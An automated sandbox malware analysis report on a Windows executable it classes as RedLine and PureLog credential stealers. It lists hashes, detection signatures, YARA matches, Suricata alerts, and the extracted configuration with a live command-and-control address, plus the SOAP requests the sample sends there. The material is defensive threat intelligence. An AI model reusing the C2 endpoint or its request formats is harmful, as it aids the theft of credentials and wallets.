Edit tour

Windows Analysis Report
lWnSA7IyVc.exe

Overview

General Information

Sample name:	lWnSA7IyVc.exe renamed because original name is a hash value
Original sample name:	3726ee297e39481c17efbe020ef5cfcc.exe
Analysis ID:	1567345
MD5:	3726ee297e39481c17efbe020ef5cfcc
SHA1:	905988b5b2601a21688bc002e79fad8855969d25
SHA256:	7010f01eb61a3e6171cff3f45dffda217cab75fcd8e6055d37bb9976d1e8294f
Tags:	exeRedLineStealeruser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

lWnSA7IyVc.exe (PID: 2008 cmdline: "C:\Users\user\Desktop\lWnSA7IyVc.exe" MD5: 3726EE297E39481C17EFBE020EF5CFCC)

lWnSA7IyVc.exe (PID: 3808 cmdline: "C:\Users\user\Desktop\lWnSA7IyVc.exe" MD5: 3726EE297E39481C17EFBE020EF5CFCC)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.229:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x2ca92:$a4: get_ScannedWallets 0x2b8f0:$a5: get_ScanTelegram 0x2c716:$a6: get_ScanGeckoBrowsersPaths 0x2a532:$a7: <Processes>k__BackingField 0x28444:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x29e66:$a9: <ScanFTP>k__BackingField
00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.1868490775.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x194dc2:$a4: get_ScannedWallets 0x1ac9e2:$a4: get_ScannedWallets 0x193c20:$a5: get_ScanTelegram 0x1ab840:$a5: get_ScanTelegram 0x194a46:$a6: get_ScanGeckoBrowsersPaths 0x1ac666:$a6: get_ScanGeckoBrowsersPaths 0x192862:$a7: <Processes>k__BackingField 0x1aa482:$a7: <Processes>k__BackingField 0x190774:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1a8394:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x192196:$a9: <ScanFTP>k__BackingField 0x1a9db6:$a9: <ScanFTP>k__BackingField
00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: lWnSA7IyVc.exe PID: 2008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lWnSA7IyVc.exe PID: 2008	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: lWnSA7IyVc.exe PID: 2008	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: lWnSA7IyVc.exe PID: 2008	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x448a9:$a4: get_ScannedWallets 0xaf9c1:$a4: get_ScannedWallets 0x43750:$a5: get_ScanTelegram 0xae868:$a5: get_ScanTelegram 0x44532:$a6: get_ScanGeckoBrowsersPaths 0xaf64a:$a6: get_ScanGeckoBrowsersPaths 0x423e3:$a7: <Processes>k__BackingField 0xad4fb:$a7: <Processes>k__BackingField 0x3f916:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xaaa2e:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x41d17:$a9: <ScanFTP>k__BackingField 0xace2f:$a9: <ScanFTP>k__BackingField
Process Memory Space: lWnSA7IyVc.exe PID: 3808	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lWnSA7IyVc.exe PID: 3808	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: lWnSA7IyVc.exe PID: 3808	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x60162:$a4: get_ScannedWallets 0x5f009:$a5: get_ScanTelegram 0x5fdeb:$a6: get_ScanGeckoBrowsersPaths 0x5dc9c:$a7: <Processes>k__BackingField 0x5b1cf:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x5d5d0:$a9: <ScanFTP>k__BackingField
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.lWnSA7IyVc.exe.50e0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.lWnSA7IyVc.exe.50e0000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.lWnSA7IyVc.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.lWnSA7IyVc.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.lWnSA7IyVc.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
2.2.lWnSA7IyVc.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
0.2.lWnSA7IyVc.exe.35524c8.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.lWnSA7IyVc.exe.35524c8.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.lWnSA7IyVc.exe.36f37f8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.lWnSA7IyVc.exe.36f37f8.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.lWnSA7IyVc.exe.35524c8.3.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.lWnSA7IyVc.exe.35524c8.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ee:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cf:$v2_6: GetUpdates
0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.lWnSA7IyVc.exe.36f37f8.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.lWnSA7IyVc.exe.36f37f8.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ee:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cf:$v2_6: GetUpdates
0.2.lWnSA7IyVc.exe.35524c8.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ee:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cf:$v2_6: GetUpdates
0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b1ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a048:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2ae6e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28c8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26b9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x285be:$a9: <ScanFTP>k__BackingField
0.2.lWnSA7IyVc.exe.36f37f8.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
0.2.lWnSA7IyVc.exe.25ad31c.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 18 entries

Suricata Signatures

ET MALWARE RedLine Stealer - CheckConnect Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T13:27:07.671218+0100	2045000	1	Malware Command and Control Activity Detected	185.222.58.229	55615	192.168.2.4	49733	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T13:27:12.660613+0100	2045001	1	Malware Command and Control Activity Detected	185.222.58.229	55615	192.168.2.4	49733	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T13:27:02.233306+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.4	49733	185.222.58.229	55615	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T13:27:08.330742+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.4	49733	185.222.58.229	55615	TCP

ETPRO MALWARE RedLine - GetUpdates Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T13:27:16.296702+0100	2848200	1	Malware Command and Control Activity Detected	192.168.2.4	49739	185.222.58.229	55615	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-03T13:27:13.296696+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.4	49737	185.222.58.229	55615	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: lWnSA7IyVc.exe

Avira: detected

Found malware configuration

Source: 2.2.lWnSA7IyVc.exe.400000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.222.58.229:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for submitted file

Source: lWnSA7IyVc.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: lWnSA7IyVc.exe

Joe Sandbox ML: detected

Source: lWnSA7IyVc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: lWnSA7IyVc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\lWnSA7IyVc.exe

Code function: 4x nop then jmp 069AB94Dh

0_2_069AAF5D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49733 -> 185.222.58.229:55615
Source: Network traffic	Suricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.229:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49733 -> 185.222.58.229:55615
Source: Network traffic	Suricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.229:55615 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49737 -> 185.222.58.229:55615
Source: Network traffic	Suricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49739 -> 185.222.58.229:55615

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.222.58.229:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49739

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 185.222.58.229:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.229:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.229:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.229:55615Content-Length: 956493Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.229:55615Content-Length: 956485Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.229

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.229:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.229:
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp, lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.229:55615
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.229:55615/
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003453000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.229:55615t-
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.0000000003413000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: lWnSA7IyVc.exe, 00000002.00000002.1869963112.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
